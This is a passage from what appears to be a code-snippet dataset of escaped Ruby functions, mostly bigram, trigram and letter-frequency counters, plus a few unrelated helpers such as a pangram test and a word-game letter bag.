789961,\n'AZ' => 768359,\n'LN' => 752316,\n'AO' => 749566,\n'FD' => 748027,\n'KW' => 719633,\n'MF' => 715087,\n'MH' => 710864,\n'SJ' => 704442,\n'UF' => 701892,\n'TV' => 698150,\n'XC' => 697995,\n'YU' => 695512,\n'BB' => 689158,\n'WW' => 674610,\n'OJ' => 661082,\n'AX' => 660826,\n'MR' => 660619,\n'WL' => 657782,\n'XE' => 653947,\n'KH' => 650095,\n'OX' => 650078,\n'UO' => 649906,\n'ZI' => 644035,\n'FG' => 637758,\n'IH' => 610683,\n'TK' => 610333,\n'II' => 607124,\n'IU' => 576683,\n'TJ' => 559473,\n'MN' => 558397,\n'WY' => 553647,\n'KY' => 553296,\n'KF' => 537342,\n'FN' => 534362,\n'UY' => 531960,\n'PW' => 530411,\n'DK' => 525744,\n'RJ' => 518157,\n'UK' => 514873,\n'KR' => 507020,\n'KU' => 506618,\n'WM' => 505687,\n'KM' => 485617,\n'MD' => 481126,\n'ML' => 478528,\n'EZ' => 465466,\n'KB' => 457860,\n'WC' => 448394,\n'WD' => 432646,\n'HG' => 429607,\n'BT' => 428276,\n'ZO' => 424016,\n'KC' => 420017,\n'PF' => 418168,\n'YV' => 411487,\n'PC' => 400308,\n'PY' => 396147,\n'WB' => 394820,\n'YK' => 391953,\n'CP' => 382923,\n'YJ' => 378679,\n'KP' => 375653,\n'PB' => 369336,\n'CD' => 358435,\n'JI' => 357577,\n'UW' => 352732,\n'UH' => 339341,\n'WF' => 336213,\n'YY' => 332973,\n'WP' => 321746,\n'BC' => 320380,\n'AQ' => 315068,\n'CB' => 298053,\n'IQ' => 291635,\n'CM' => 285942,\n'MG' => 285133,\n'DQ' => 283314,\n'BJ' => 282608,\n'TZ' => 280007,\n'KD' => 277982,\n'PD' => 273162,\n'FJ' => 269865,\n'CF' => 267630,\n'NZ' => 266461,\n'CW' => 257253,\n'FV' => 244685,\n'VY' => 233082,\n'FK' => 228905,\n'OZ' => 228556,\n'ZZ' => 221275,\n'IJ' => 219128,\n'LJ' => 218362,\n'NQ' => 217422,\n'UV' => 212051,\n'XO' => 211173,\n'PG' => 211133,\n'HK' => 210385,\n'KG' => 209266,\n'VS' => 204093,\n'HV' => 197539,\n'BM' => 191807,\n'HJ' => 189906,\n'CN' => 188046,\n'GV' => 186777,\n'CG' => 181590,\n'WU' => 180884,\n'GJ' => 176947,\n'XH' => 166599,\n'GK' => 163830,\n'TQ' => 159111,\n'CQ' => 157546,\n'RQ' => 156933,\n'BH' => 154489,\n'XS' => 154347,\n'UZ' => 153736,\n'WK' => 148964,\n'XU' => 147533,\n'UX' => 144814,\n'BD' => 141752,\n'BW' => 140189,\n'WG' => 139890,\n'MV' => 136314,\n'MJ' => 134263,\n'PN' => 131645,\n'XM' => 127492,\n'OQ' => 122677,\n'BV' => 120081,\n'XW' => 119322,\n'KK' => 118811,\n'BP' => 115161,\n'ZU' => 113538,\n'RZ' => 113432,\n'XF' => 113031,\n'MK' => 111041,\n'ZH' => 107639,\n'BN' => 106125,\n'ZY' => 105871,\n'HQ' => 101241,\n'WJ' => 99435,\n'IY' => 98361,\n'DZ' => 98038,\n'VR' => 96416,\n'ZS' => 94993,\n'XY' => 94329,\n'CV' => 94224,\n'XB' => 94041,\n'XR' => 90046,\n'UJ' => 88168,\n'YQ' => 87953,\n'VD' => 85611,\n'PK' => 83017,\n'VU' => 82830,\n'JR' => 80471,\n'ZL' => 80039,\n'SZ' => 79840,\n'YZ' => 78281,\n'LQ' => 77148,\n'KJ' => 76816,\n'BF' => 75352,\n'NX' => 74844,\n'QA' => 73527,\n'QI' => 73387,\n'KV' => 73184,\n'ZW' => 68865,\n'WV' => 63930,\n'UU' => 63043,\n'VT' => 62912,\n'VP' => 62577,\n'XD' => 60101,\n'GQ' => 59750,\n'XL' => 59585,\n'VC' => 59024,\n'CZ' => 57914,\n'LZ' => 57314,\n'ZT' => 56955,\n'WZ' => 52836,\n'SX' => 50975,\n'ZB' => 50652,\n'VL' => 49032,\n'PV' => 48105,\n'FQ' => 47504,\n'PJ' => 47043,\n'ZM' => 46034,\n'VW' => 45608,\n'CJ' => 41526,\n'ZC' => 41037,\n'BG' => 40516,\n'JS' => 39326,\n'XG' => 39289,\n'RX' => 38654,\n'HZ' => 37066,\n'XX' => 35052,\n'VM' => 35024,\n'XN' => 34734,\n'QW' => 34669,\n'JP' => 34520,\n'VN' => 33082,\n'ZD' => 32906,\n'ZR' => 32685,\n'FZ' => 31186,\n'XV' => 31117,\n'ZP' => 30389,\n'VH' => 30203,\n'VB' => 29192,\n'ZF' => 28658,\n'GZ' => 28514,\n'TX' => 28156,\n'VF' => 28090,\n'DX' => 27413,\n'QB' => 27307,\n'BK' => 26993,\n'ZG' => 26369,\n'VG' => 
25585,\n'JC' => 24770,\n'ZK' => 24262,\n'ZN' => 24241,\n'UQ' => 23386,\n'JM' => 22338,\n'VV' => 22329,\n'JD' => 21903,\n'MQ' => 21358,\n'JH' => 20960,\n'QS' => 20847,\n'JT' => 20408,\n'JB' => 19380,\n'FX' => 19313,\n'PQ' => 18607,\n'MZ' => 18271,\n'YX' => 16945,\n'QT' => 16914,\n'WQ' => 16245,\n'JJ' => 16085,\n'JW' => 16083,\n'LX' => 15467,\n'GX' => 14778,\n'JN' => 14452,\n'ZV' => 14339,\n'MX' => 14250,\n'JK' => 13967,\n'KQ' => 13905,\n'XK' => 13651,\n'JF' => 12640,\n'QM' => 12315,\n'QH' => 12273,\n'JL' => 12149,\n'JG' => 12023,\n'VK' => 11469,\n'VJ' => 11432,\n'KZ' => 11192,\n'QC' => 10667,\n'XJ' => 10629,\n'PZ' => 9697,\n'QL' => 9603,\n'QO' => 9394,\n'JV' => 8925,\n'QF' => 8778,\n'QD' => 8678,\n'BZ' => 8132,\n'HX' => 7526,\n'ZJ' => 7167,\n'PX' => 6814,\n'QP' => 6062,\n'QE' => 6020,\n'QR' => 5975,\n'ZQ' => 5773,\n'JY' => 5723,\n'BQ' => 5513,\n'XQ' => 5416,\n'CX' => 5300,\n'KX' => 5083,\n'WX' => 4678,\n'QY' => 4557,\n'QV' => 4212,\n'QN' => 3808,\n'VX' => 3192,\n'BX' => 3021,\n'JZ' => 2859,\n'VZ' => 2633,\n'QG' => 2567,\n'QQ' => 2499,\n'ZX' => 2463,\n'XZ' => 2082,\n'QK' => 2023,\n'VQ' => 1488,\n'QJ' => 1342,\n'QX' => 765,\n'JX' => 747,\n'JQ' => 722,\n'QZ' => 280\n}\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tall = Hash.new\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# do something for each line\n\t\t\ttitle = cleanup_title(line)\n\t\t\tunless title.nil?\n\t\t\t\tgram = title.split().each_cons(2).to_a\n\t\t\t\tgram = gram.map{ |n| n.join(' ') }\n \t\t\t\tgram = gram.each_with_object(Hash.new(0)) { |word, obj| obj[word] += 1 }\n \t\t\t\tif gram.any?\n\t \t\t\t\tall.merge!(gram) { |k, old, new| old + new }\n\t \t\t\tend\n\t\t\tend\n\t\tend\n\t\t$bigramsArray = all.sort_by { |k, v| -v }\n\t\tcreate_hash()\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def load_bigrams(filename)\n #puts filename\n CSV.foreach(filename, :headers=>true) do |row|\n bigram = row['bigram']\n bigram.gsub!(' ','_')\n @bigrams << bigram\n end\n end",
"def scan\n $stderr.print \"[bigrams] \"\n\n last = nil\n\n bigram_files.each do |file|\n $stderr.print \".\"\n\n text = File.read(file).gsub(\"\\n\", \" \")\n states = text.split(/[.,:;?!()\"]\\s*/)\n\n states.each do |state|\n state.scan(WORD) do |word|\n word = normalize(word)\n if valid_word?(word)\n\t\t if last && good_bigram?(word)\n add(last, word, file)\n\t\t end\n\t\t last = word\n else\n last = nil\n end\n end\n last = nil\n end\n last = nil\n end\n\n $stderr.puts\n end",
"def add(word)\n word.scan(/./) {|l| @hist[l] = @hist[l] + 1 if ('a'..'z') === l}\n @total_letters += word.size\n end",
"def trigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word_1 = \"\"\n\t prev_word_2 = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word_1 != \"\" && prev_word_2 != \"\")\n\t\t @trifreq[prev_word_1 + \" \" + prev_word_2 + \" \" + word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 != \"\")\n\t\t @trifreq[\"PHI \"+prev_word_2+\" \"+word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 == \"\")\n\t\t @trifreq[\"PHI PHI \"+word] += 1\t\n\t\tend \t \t\n\t\tprev_word_1 = prev_word_2 \n\t\tprev_word_2 = word\n\t }\n\t}\n end",
"def each\n\t\t @table.each do |pair, bigram|\n yield(bigram)\n\t\t end\n\t\t end",
"def add_table(table_name)\n space_file = \"%s/%s.ibd\" % [config[:data_directory], table_name]\n if File.exist?(space_file)\n add_space_file(space_file)\n else\n add_space_orphan(table_name)\n end\n end",
"def dump_bigram_info_from_hash()\n\n cumulative_bigram_count = 0\n\n $bigram_count.keys.sort.each do |bigram|\n local_lead_word = bigram.split(/\\s/)[0] #shouldn't need to extract this each time\n cumulative_bigram_count += $bigram_count[bigram]\n cumulative_proportion = cumulative_bigram_count.to_f / $lead_word_count[local_lead_word].to_f\n puts sprintf(\"%s\\t%f\", bigram, cumulative_proportion )\n end\n\nend",
"def tally!(file_count)\n table.each do |spelling, word|\n word.tally!(table.size, file_count)\n end\n end",
"def add(page)\n return if task['skip_file_generation']\n num_rows = file_writer.add(page)\n\n if task['with_rehearsal'] and @index == 0 and !@rehearsaled\n if num_rows >= task['rehearsal_counts']\n load_rehearsal\n @rehearsaled = true\n end\n end\n end",
"def add_to_table(cmd)\n return unless size_check(cmd)\n @table.unshift(cmd)\n end",
"def most_frequent_bigram(str)\n binaries = [] \n letters = str.split(\"\") #\"thrill\"\n (0...(letters.length-1)).each_with_index do |letter,idx|\n binaries << (letters[idx] + letters[(idx + 1)])\n end\n hash = Hash.new(0)\n binaries.each do |pairs|\n hash[pairs] += 1 \n end\n sorted = hash.sort_by { |k , v| v }\n return sorted[-1][0]\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\t#begin\n\t#processes file at each line\n\tIO.foreach(file_name) do |line|\n\t\t#cleans up song title\n\t\tline = cleanup_title(line)\n\t\t#prevents a nil error with a cleaned up song\n\t\tif line != nil\n\t\t\t#removes stop words from line\n\t\t\tline = cleanupStopWords(line)\n\t\t\t#creates an array of bigrams as found on stackoverflow.com\n\t\t\tbigramArray = line.split.each_cons(2) do |e|\n\t\t\t\t#checks if the bigram exists\n\t\t\t\tif e[0] && e[1] != nil\n\t\t\t\t\t#makes a count from the existing bigram hash value\n\t\t\t\t\tcount = $bigrams[e[0]][e[1]]\n\t\t\t\t\tcount += 1\n\t\t\t\t\t#sets bigram hash value to updated count\n\t\t\t\t\t$bigrams[e[0]][e[1]] = count\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend\n\tputs \"Finished. Bigram model built.\\n\"\nrescue\n\tSTDERR.puts \"Could not open file\"\n\texit 4\nend",
"def ngram_analysis(str, n)\r\n # use a hash to store ngram - frequency mapping\r\n freq = Hash.new\r\n bigram = \"\"\r\n count = n-1\r\n i = 0\r\n\r\n # get the first ngram\r\n for i in 0..count\r\n bigram[i] = str[i]\r\n end\r\n\r\n freq[bigram] = 1\r\n\r\n str.each_char do |char|\r\n if i>=n then\r\n\r\n # bigram, trigram or quadrigram?\r\n bigram[0] = bigram[1]\r\n if n==2 then\r\n bigram[1] = char\r\n elsif n==3 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = char\r\n elsif n==4 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = bigram[3]\r\n bigram[3] = char\r\n end\r\n\r\n # updates values in the hash\r\n if freq.key?(bigram)==false then\r\n freq[bigram] = 1\r\n else \r\n freq[bigram] = freq[bigram]+1\r\n end\r\n\r\n end\r\n i = i + 1\r\n end\r\n\r\n # sort and print\r\n freq = freq.sort_by {|_key, value| value}.reverse.to_h\r\n i=0\r\n puts \"N-gram Analysis Results:\"\r\n freq.each do |key, value|\r\n if value!=1 && i<20 then\r\n puts key.to_s+\"\\t\"+value.to_s\r\n end\r\n i = i + 1\r\n end\r\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\n\t\t\ttitle = cleanup_title(line)\n\t\t\t# If the title is valid continue\n\t\t\tif title != nil\n\t\t\t\t# Split the title into words\n\t\t\t\twords = title.split(\" \")\n\t\t\t\tw_index = 0\n\t\t\t\t# Remove the stop words\n\t\t\t\twords = words - %w{a an and by for from in of on or out the to with}\n\t\t\t\t# If there is more than one word in a title add to biagram\n\t\t\t\tif words.length > 1\n\t\t\t\t\twords.each do |w|\n\t\t\t\t\t\t# If there is no base word add it\n\t\t\t\t\t\tif $bigrams[w] == nil\n\t\t\t\t\t\t\t$bigrams[w] = Hash.new\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] = 1\n\t\t\t\t\t\t# Else if there is no word following the word add it\n\t\t\t\t\t\telsif $bigrams[w][words[w_index + 1]] == nil\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] = 1\n\t\t\t\t\t\t# Else increment the count of the word following\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] += 1\n\t\t\t\t\t\tend\n\t\t\t\t\t\tw_index += 1\n\t\t\t\t\t\t# Don't include the last word in the title\n\t\t\t\t\t\tif w_index > words.length - 2\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\traise\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def most_frequent_bigram(str)\n bigram_hash = Hash.new(0)\n\n (0...str.length - 1).each do |idx|\n bigram_hash[str[idx] + str[idx+1]] += 1\n end\n\n sorted = bigram_hash.sort_by { |k, v| v }\n sorted[-1][0]\nend",
"def lexigram_counter(sequencetext)\n @sequencetext = sequencetext\n\t@lexigrams = lexigram_searcher(@sequencetext)\n\tif (@lexigrams === [\"no letters remain after processing\"])\n\t @lexigrams_count = 0\n else\n @lexigrams_count = @lexigrams.count.to_s\n end\n end",
"def use_bigram(str,i)\n\t\tmax=@han[str[i]][0]\n\t\tif i==0\n\t\t\t@han[str[i]].each{|h|\n\t\t\t\tif ref(\"$\"+h)>ref(\"$\"+max)\n\t\t\t\t\tmax=h\n\t\t\t\tend\n\n\t\t\t}\n\t\telse\n\t\t\t\t@han[str[i]].each{|h|\n\t\t\t\tif ref(str[i-1]+h)>ref(str[i-1]+max)\n\t\t\t\t\tmax=h\n\t\t\t\tend\n\n\t\t\t}\n\t\tend\n\t\treturn max\n\n\tend",
"def bigram_compare(word1_bigrams, word2_bigrams)\n most_bigrams = [word1_bigrams.count, word2_bigrams.count].max\n num_matching(word1_bigrams, word2_bigrams).to_f / most_bigrams\n end",
"def most_frequent_bigram(str)\n bigram = Hash.new(0)\n (0...str.length).each { |index| bigram[str[index..index+1]] += 1 }\n bigram.key(bigram.values.max)\nend",
"def line_count_experiment\n @letters_two.dump\n lines = @letters_two.xlate(@line_count_map)\n lines << @extra_digits\n lines.flatten!\n lines.dump('append')\n lines.chunk(2).to_i.collect { |d| d.to_s(5) }.dump(:from_base_5).to_i.to_letter\nend",
"def most_frequent_bigram(str)\n count = Hash.new(0)\n\n (0...str.length - 1).each do |i|\n bigram = str[i..i + 1]\n\n count[bigram] += 1\n end\n\n count.sort_by { |k, v| v } [-1][0]\nend",
"def most_frequent_bigram(str)\n bigram_count = Hash.new(0)\n\n # count each bigram appearance\n (0...str.length - 1).each do |i|\n bigram = str[i] + str[i+1]\n bigram_count[bigram] += 1\n end\n\n # return most frequent bigram\n bigram_count.max_by { |k, v| v }.first\nend",
"def most_frequent_bigram(str)\n h = Hash.new(0)\n bigrams = (0..str.length-2).map{|i| str[i..i+1]}\n bigrams.each {|bi| h[bi] += 1}\n h.key(h.values.max)\nend",
"def add_to_repetitions(char)\n if char.rank == @largest_power && !@last_char_was_prefix\n @number_of_repetitions += 1\n else\n @number_of_repetitions = 0\n end\n end",
"def set_count(gram,value)\n @dirty = true\n @frequencies[gram] = value\n end",
"def most_frequent_bigram(str)\n new_array =[]\n new_arr = []\n hash = {}\n hash = Hash.new {|k, v| hash[k] = 0}\n new_str = str.split(\"\")\n (0...new_str.length).each do |i0|\n (i0...new_str.length).each do |iz|\n pair = new_str[i0..iz]\n new_array << pair\n end\n end\n\n new_array.each do |combined|\n if combined.length == 2\n new_arr << combined \n end\n end\n \n new_arr.each do |pairs| \n hash[pairs] += 1\n end\n \n hash.each {|k, v| return k.join(\"\") if v == hash.values.max}\n\n \nend",
"def unigram_exists(word)\n\t$unigrams.each do |x|\n\t\tif x.matches(word)\n\t\t\tx.increase_count\n\t\t\treturn true\n\t\tend\t\n\tend\n\treturn false\nend",
"def add_and_check_digrams(rule, node, digram_index)\n puts \"Starting add_and_check, seq is #{rule.sequence.inspect}\"\n digram=[node, node.next]\n digram_values=[node.value, node.next.value]\n puts \"This digram is #{digram.inspect}\"\n digram_locations=digram_index[digram_values]\n if (existing_rule=digram_locations.first).is_a? Rule\n # replace with existing rule\n puts \"Main loop, replace with existing\"\n replacement=rule.replace_digram_with( digram.first, existing_rule ) \n puts \"main replace done\"\n elsif digram_locations.size+1 > K\n # create a new rule\n $grammar.counter+=1\n new_rule=Rule.new($grammar.counter, digram_index)\n digram_values.each {|val| new_rule << val}\n $grammar << new_rule\n digram_locations << digram.first\n # replace all occurrences of the digram with the rule\n digram_locations.each {|digram_head|\n puts \"Main loop, replace with new\"\n replacement=rule.replace_digram_with( digram_head, new_rule )\n puts \"main replace new done\"\n }\n else\n # Not more than K occurrences yet.\n # Add this node to the list of digram locations\n digram_locations << node\n end\n puts \"Leaving. seq is now #{rule.sequence.inspect}\"\nend",
"def most_frequent_bigram(str)\n sub_str_arr = []\n bigram_count = Hash.new(0)\n str.each_char.with_index do |char,idx|\n if idx+1 != nil && str[idx..idx+1].length ==2\n sub_str_arr << str[idx..idx+1]\n end\n end\n sub_str_arr.each {|bigram| bigram_count[bigram]+=1}\n \n sorted = bigram_count.sort_by {|key,value| value}\n sorted [-1][0]\n\n\nend",
"def start_table\r\n n = @char_set.length\r\n t_size = @size\r\n create_table(@char_set, '', n, t_size)\r\n end",
"def most_frequent_bigram(str)\n counts = Hash.new(0)\n (0...str.length-1).each do |i|\n bigram = str[i..i + 1]\n counts[bigram] += 1\n end\n\n sorted = counts.sort_by { |h,v| v } # sorts by value \n sorted.last[0]\nend",
"def most_frequent_bigram(str)\n n, hash, res, ct = str.length, Hash.new(0), \"\", 0\n (0...n).each do |i|\n break if i + 2 > n\n w = str[i..(i + 1)]\n hash[w] += 1\n if(ct < hash[w])\n ct = hash[w]\n res = w\n end\n end\n res\nend",
"def create_table(set, prefix, n, t_size)\r\n \t# base case\r\n if t_size.zero?\r\n @table_array[@table_i] = prefix.chars\r\n @table_i += 1\r\n return\r\n end\r\n \r\n # recursive case\r\n set.each do |x|\r\n new_prefix = prefix + x\r\n create_table(set, new_prefix, n, t_size - 1)\r\n end\r\n end",
"def most_frequent_bigram(str)\n bigram_hash = Hash.new(0)\n\n i = 0\n while i < str.length - 1\n bigram_hash[str[i..i+1]] += 1\n i += 1\n end\n\n bigram_hash.max_by {|k, v| v}[0]\nend",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n str.each_char.with_index do |char, idx|\n key = char + str[idx + 1] if idx < str.length - 1\n hash[key] += 1\n end\n\n hash.key(hash.values.max)\nend",
"def test_approach\n prefix = \"This pangram tallies \"\n solution = \"This pangram tallies five a's, one b, one c, two d's, twenty-eight e's, eight f's, six g's, eight h's, thirteen i's, one j, one k, three l's, two m's, eighteen n's, fifteen o's, two p's, one q, seven r's, twenty-five s's, twenty-two t's, four u's, four v's, nine w's, two x's, four y's and one z.\"\n pangram = SelfDocumentingPangram.new(prefix)\n assert_equal(solution, pangram.add_count(pangram.count(solution)))\n\n prefix = \"This terribly inefficient pangram contains \"\n solution = \"This terribly inefficient pangram contains five a's, two b's, three c's, two d's, thirty-one e's, six f's, four g's, ten h's, sixteen i's, one j, one k, three l's, two m's, twenty n's, thirteen o's, two p's, one q, twelve r's, twenty-eight s's, twenty-eight t's, three u's, three v's, nine w's, four x's, six y's and one z.\"\n pangram = SelfDocumentingPangram.new(prefix)\n assert_equal(solution, pangram.add_count(pangram.count(solution)))\n end",
"def add_letters_to_bag()\n\n bag = [\"Z\", \"X\", \"J\", \"K\", \"Q\"] # Letters which only appear once\n \n 2.times do # Letters which appear twice\n bag << \"V\"\n bag << \"W\"\n bag << \"B\"\n bag << \"C\"\n bag << \"F\"\n bag << \"H\"\n bag << \"M\"\n bag << \"Y\"\n bag << Blank.new\n bag << \"P\"\n end\n\n 3.times do bag << \"G\" end\n\n 4.times do\n bag << \"D\"\n bag << \"L\"\n bag << \"S\"\n bag << \"U\"\n end\n\n 6.times do\n bag << \"N\"\n bag << \"R\"\n bag << \"T\"\n end\n \n 8.times do bag << \"O\" end \n\n 9.times do\n bag << \"A\"\n bag << \"I\"\n end\n\n 12.times do bag << \"E\" end\n\n return bag\n end",
"def append_word(size)\n return false unless remaining > size\n w = @buckets[size].pop\n @lines[@current_index] += @sep + w\n @sep = \" \"\n return true\n end",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n str.each_char.with_index {|c, i| hash[c + str[i+1]] += 1 if str[i + 1]}\n hash.key(hash.values.max)\nend",
"def most_frequent_bigram(str)\n most_frequent_bigram = Hash.new(0)\n\n str.each_char.with_index do |char, index|\n bigram = \"#{char}#{str[index + 1]}\"\n most_frequent_bigram[bigram] += 1\n end\n\n max_count = most_frequent_bigram.sort_by {|k, v| v}\n max_count[-1][0]\nend",
"def add_initial(prefix)\n # A pangram is : \"prefix\" + counts of each letter + \"and\" before 'z'\n known_string = prefix.downcase + ('a'..'z').to_a.join(\"\") + \"and\"\n add_function(:initial, known_string, '+', @add_word)\n\n # known_count[letter] is the count of each letter we know must exist\n known_count = known_string.to_counts\n\n name_bytes = Array.new(26).fill(0)\n (1..99).each { |n| n.to_en.accum_counts(name_bytes) }\n in_names = name_bytes.collect {|n| n > 0}\n # Now we have an array of booleans representing whether a character\n # is constant (only appearing in the prefix or enumerated list)\n # or is a variable quantity (because it also appears in number names\n\n # From the count of what we initially knew to be present, return\n # our initial target. This is our best initial guess for a result\n # which will converge quickly. Basically, anything which is\n # not found in a name, is now known to occur a constant number of\n # times in the result. If it is in a name, I just punt and\n # prepare to see it 1 time like Simon does.\n @target_template = in_names.zip(known_count).collect do |in_name, known|\n if in_name\n 1\n else\n known\n end\n end\n\n # Starting with the count of known contents add the letter counts\n # for the numbers we expect to see. The counts in the target template\n # indicate that we expect to see N occurences of that (char) in the\n # result. Thus if 7 a's are reflected in the target we must have\n # an associated set of bytes {seven's} in the result. The following\n # code initializes the result template with the static byte counts\n # that we know must occur in the result. Using the target template as\n # a guide, we then call the appropriate adder_function to increment\n # the counts for the spelled out numbers which MUST be present in\n # the result if our guess remains congruent. e.g. if the target contained\n # [7, 2, 1, 2]... we MUST increment the result_template by\n # \"sevens\" \"twos\" \"one\" \"twos\"\n @result_template = known_count.dup\n @target_template.each do |n|\n @add_word[n].call(@result_template)\n end\n\n end",
"def count(gram)\n @dirty = true\n\n unless @frequencies.has_key?(gram)\n @frequencies[gram] = 0\n end\n\n return @frequencies[gram] += 1\n end",
"def create_title(word)\n\tcurrent = word\n\tword_num = 1 # begin word number at one\n\ttitle = \"\" # title begins as empty\n\ttitle += word # add current word\n\twhile word_num !=20 # while we have less than 20 words...\n\t\t\tif ($bigrams.has_key?(current)) # if the word exists in the bigram\n\t\t\t\tif (mcw(current) == nil)\n\t\t\t\t\t# do nothing and exit\n\t\t\t\t\tword_num = 20\n\t\t\t\telse\n\t\t\t\t\taddition = mcw(current) # thing to add is mcw\n\t\t\t\t\ttitle += \" \" # add space for readability\n\t\t\t\t\ttitle += addition # add addition to the title\n\t\t\t\t\tcurrent = addition # set current to the new wordtitle += addition # add the mcw\n\t\t\t\t\tword_num += 1 # increment by one and then go throuh\n\t\t\t\tend\n\t\t\telse word_num = 20 # otherwise, we exit\n\t\t\tend\n\t\tend\n\t\treturn title\nend",
"def most_frequent_bigram(str)\n#grab substrings of length 2\n#hash that contains the substring\n#return key with max value \n\n bigrams = Hash.new(0)\n str.each_char.with_index do |char, i|\n bigrams[str[i..i+1]] += 1 if i + 1 < str.length\n end\n bigrams.max_by { |k,v| v }.first\nend",
"def visit_file(name)\n\t\ttrigram = []\n\t\tFile.open(name).each { |line|\n\t\t\ttrigram.push line.chomp\n\t\t\tif trigram.length > 3\n\t\t\t\ttrigram.shift\n\t\t\tend\n\t\t\tif trigram.length == 3\n\t\t\t\tt = Array.new(trigram)\n\t\t\t\t@trigram_counts[t] = 1 + @trigram_counts[t] \n\t\t\tend\n\t\t}\n\tend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# Pull title out of text line\n\t\t\ttitle = cleanup_title(line)\n\n\t\t\tif not title.nil?\n\t\t\t # Split title into individual words\n\t\t\t words = title.split(\" \")\n\n\t\t\t\t# Remove stop words\n\t\t\t\tstop_words = ['a', 'an', 'and', 'by', 'for', 'from', 'in', 'of', 'on',\n\t\t\t\t\t 'or', 'out', 'the', 'to', 'with']\n\n\t\t\t\tfor i in 0..stop_words.length-1\n\t\t\t\t\twords.delete(stop_words[i])\n\t\t\t\tend\n\n\t\t\t\t# Count subsequent words\n\t\t\t\tfor i in 0..words.length-2\n\t\t\t\t\t$bigrams[words[i]][words[i+1]] += 1\n\t\t\t\tend\n\t\t\tend\n\tend\n\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def add_PB_buffer\n show do\n title \"Add the following volumes of PB buffer to the corresponding tube.\"\n table operations.start_table\n .input_item(INPUT)\n .custom_column(heading: \"PB Volume in uL\", checkable: true) { |op| 500} # add 5x PB\n .end_table\n warning \"After adding volumes, vortex and spin all tubes\"\n end\n end",
"def most_frequent_bigram(str)\n adjacent_letter={}\n letter=\"\"\n (0...str.length-1).each do |i|\n letter=str[i]+str[i+1]\n if adjacent_letter.has_key?(letter)\n adjacent_letter[letter]+=1\n else\n adjacent_letter[letter]=1\n end\n end\n\n max=0\n max_aj=\"\"\n adjacent_letter.each do |k,v|\n if v>max\n max=v\n max_aj=k\n end\n end\n max_aj\n\n\nend",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n\n i = 0\n while i < str.length - 1\n bigrams[str[i..i+1]] += 1 \n i += 1\n end\n\n max_num = 0\n max = nil\n\n bigrams.each do |k,v|\n if v > max_num\n max_num = v\n max = k\n end\n end\n max\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\tsong = cleanup_title(line)\n\n\t\t\tif not song.nil? and song =~ /^[\\d\\w\\s']+$/\n\t\t\t\tsong = song.downcase\n\t\t\t\tsong.gsub!(/ {2}/, \" \")\n\t\t\t\tsong = remove_stop_words(song)\n\t\t\t\twords = song.split(\" \");\n\n\t\t\t\tupdate_bigram_counts(words)\n\t\t\tend\n\t\tend\n\n\t\tputs \"Finished. Bigram model built.\\n\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def give_letters(nbr_of)\n new_stock = []\n count_letters = []\n\n stock_letters.shuffle.each do |v|\n if count_letters.size < nbr_of\n count_letters << v\n else\n new_stock << v\n end\n end\n self.stock_letters = new_stock\n self.save\n return count_letters\n end",
"def longest_bigram(str)\n\tbigram_hash = Hash.new\n bigram_str = str.split(\" \")\n bigram_str.each_with_index do |word, i|\n if i == bigram_str.length - 1\n next\n else\n bigram_hash[word + \" \" + bigram_str[i + 1]] = (word + \" \" + bigram_str[i + 1]).length\n end\n end\n temp_str = \"\"\n temp_str_length = 0\n bigram_hash.keys.each do |compound|\n if compound.length > temp_str_length\n temp_str = compound\n temp_str_length = compound.length\n end\n end\n p temp_str\nend",
"def mis_ramos\n\n\tend",
"def to_asciibib(prefix = \"\")\n pref = prefix.empty? ? \"size\" : \"#{prefix}.size\"\n size.map { |s| s.to_asciibib pref, size.size }.join\n end",
"def most_frequent_bigram(str)\n pairs = Hash.new(0)\n str.each_char.with_index do |letter, indx|\n if indx != str.length-1\n pair = letter + str[indx+1]\n end\n pairs[pair] += 1\n end\n pairs.key(pairs.values.max)\nend",
"def q_and_a(token_size = TOKEN_SIZE, char_clean = CHAR_CLEAN, test = \"n\")\n prepend_char = \"\"\n if test == \"y\"\n prepend_char = \"test-\"\n end\n token_index = create_index(token_size,char_clean)\n unique_index = token_index.delete_if{|key, value| value.size > 1}\n output_dir = Pathname.new(OUTPUT_DIR)\n output_dir.mkpath if !output_dir.exist?\n token_file = File.open(File.join(OUTPUT_DIR, prepend_char + TOKEN_FILENAME), \"w\")\n word_file = File.open(File.join(OUTPUT_DIR, prepend_char + WORD_FILENAME), \"w\")\n unique_index.each do |key, value|\n token_file.puts key\n word_file.puts value\n end \n token_file.close\n word_file.close\n end",
